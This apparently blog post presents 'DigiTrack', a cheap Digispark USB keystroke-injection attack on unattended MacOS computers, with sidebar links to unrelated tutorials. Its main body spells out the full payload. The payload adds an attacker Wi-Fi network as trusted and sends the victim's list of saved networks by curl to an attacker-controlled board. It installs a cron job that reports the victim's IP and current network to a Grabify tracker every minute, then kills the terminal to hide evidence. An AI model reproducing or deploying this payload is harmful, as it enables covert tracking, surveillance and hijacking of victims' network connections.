DigiTrack : Attacks For $5 or Less Using Arduino

In 30 seconds, DigiTrack attack can learn which networks a MacOS computer has connected to before, and plant a script that tracks the current IP address and Wi-Fi network every 60 seconds.

It includes Hardtracker – Digispark VPN buster to send the IP address and BSSID/SSID of nearby Wi-Fi networks on a MacOS computer to a Grabify tracker every 60 seconds.

This is a $5 attack that does a couple things:

  • Inserts a Wi-Fi backdoor onto a victim computer, allowing you to capture the victim’s data connection at any time when you are in Wi-Fi range.
  • Steals a list of every network the victim has ever connected to (for tracking, classifying, and hijacking data connection)
  • Inserts a tracking job that send the IP address and currently connected network to a Grabify link every 60 seconds.

Also Read – CVE-2020-0796 : Windows SMBv3 Client/Server Remote Code Execution Vulnerability

Attack goes: A victim leaves a MacOS computer unattended for 30 seconds. The attacker inserts a DigiSpark board loaded with an attack payload. The payload looks like this (with delays and single key strokes removed):

  • DigiKeyboard.print(“networksetup -setairportnetwork en0 ‘sneakernet’ 00000000”);
    • We add the network “Sneakernet” to our trusted network list and connect to it.
  • DigiKeyboard.print(“curl -m 10 –silent –output /dev/null -X POST -H “Content-Type: text/plain” –data “$(networksetup -listpreferredwirelessnetworks en0)” 192.168.4.1 &”);
    • After connecting, we send a CURL request listing every single network the MacOS computer has connected to in the past to the esp8266 creating the “Sneakernet” network. The & puts the process in the background in case it takes too long, and the -m sets a timer of 10 seconds to prevent it taking too long. Now we know which Wi-Fi networks the victim has joined, and which networks will force the computer to connect without asking.
  • DigiKeyboard.print(“export VISUAL=nano; crontab -e”);
    • We create a job that will execute every 60 seconds
  • DigiKeyboard.print(“* * * * * curl –silent –output /dev/null –referer “$(/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -I | awk ‘/ SSID/ {print substr($0, index($0, $2))}’)” https://grabi/YOURLINK“);
    • We suppress the output of CURL, and grab the network name of the currently connected Wi-Fi network. We sent this along with a CURL request to a tracking URL, delivering the target’s IP address and currently connected Wi-Fi network every 60 seconds.
  • DigiKeyboard.print(“wait && kill -9 $(ps -p $PPID -o ppid=)”);
    • Finally, we wait for all background processes to finish, and kill the shit out of the terminal window to hide the evidence.

Total run time is about 30 seconds, not including the few seconds the Digisparks waits for a sketch to upload.

Notes: Grabify may go into “I’m under attack” mode and not allow checkin. Look for this line: div class=”cf-browser-verification cf-im-under-attack”

If you see it, then the IP address is being blocked by cloudflare.

R K

Recent Posts

Best OSINT Tools for Private Investigators 2026: Legal People and Asset Research

Private investigators use OSINT to collect public information, verify identities, review business connections, check public…

4 minutes ago

Best OSINT Tools for Journalists 2026: Verify Sources, Images and Claims

Journalists use OSINT to verify public information before publishing. In 2026, misinformation, AI-generated images, fake…

11 hours ago

Install Docker on Ubuntu 20.04: Complete Step-by-Step Guide

Docker is an open-source platform that lets you package and run applications inside containers. Each container…

22 hours ago

Install PostgreSQL on Ubuntu: Database Setup and Admin Guide

PostgreSQL (often called Postgres) is an open-source relational database system. It supports advanced features like JSON…

22 hours ago

Install Xrdp Remote Desktop on Ubuntu: Setup and Connect

Xrdp is an open-source server that lets you connect to your Ubuntu machine from another computer…

23 hours ago

Tomcat 9 on Ubuntu 20.04: Install, Configure, and Start

Apache Tomcat is an open-source web server and Java servlet container. It is one of the…

23 hours ago